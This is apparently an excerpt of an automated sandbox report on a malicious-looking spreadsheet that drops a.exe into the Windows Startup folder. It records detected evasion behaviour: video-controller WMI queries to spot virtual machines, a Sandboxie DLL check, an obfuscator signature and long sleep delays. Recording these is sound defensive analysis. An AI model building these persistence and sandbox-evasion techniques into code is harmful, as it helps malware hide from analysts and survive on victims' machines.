Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX

Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls

Stream path 'Workbook' entropy: 7.96834669995 (max. 8.0)

Malware Analysis System Evasion:

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLL

Yara detected Beds Obfuscator

Show sources

Source: Yara match	File source: 00000011.00000002.876240165.0000000007590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.715456049.0000000006E20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.789219576.0000000007530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match	File source: 1.2.a.exe.6e20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.7530000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3a89990.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.7590000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3969990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.7590000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.6e20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3889990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.7530000.5.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10800000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10799657
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10799391
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10799266
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10799141
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10798860
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10798704
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10798594
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10798438
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10798297
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10798079
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10797907
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10797704
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10797500
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10797204
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10796750
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10796500
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10796313
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10796110
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10795954
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10795813
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10795500
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10795360
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10795204
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10795063
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10794907
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10794750
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10794610
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10794485
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10794344
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10794063
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10793954
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10789125
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10789016
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10788907
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10788750
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10788641
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10788500
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10788391
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 10788250
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1905	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 833	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Window / User API: threadDelayed 3271
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Window / User API: threadDelayed 5739

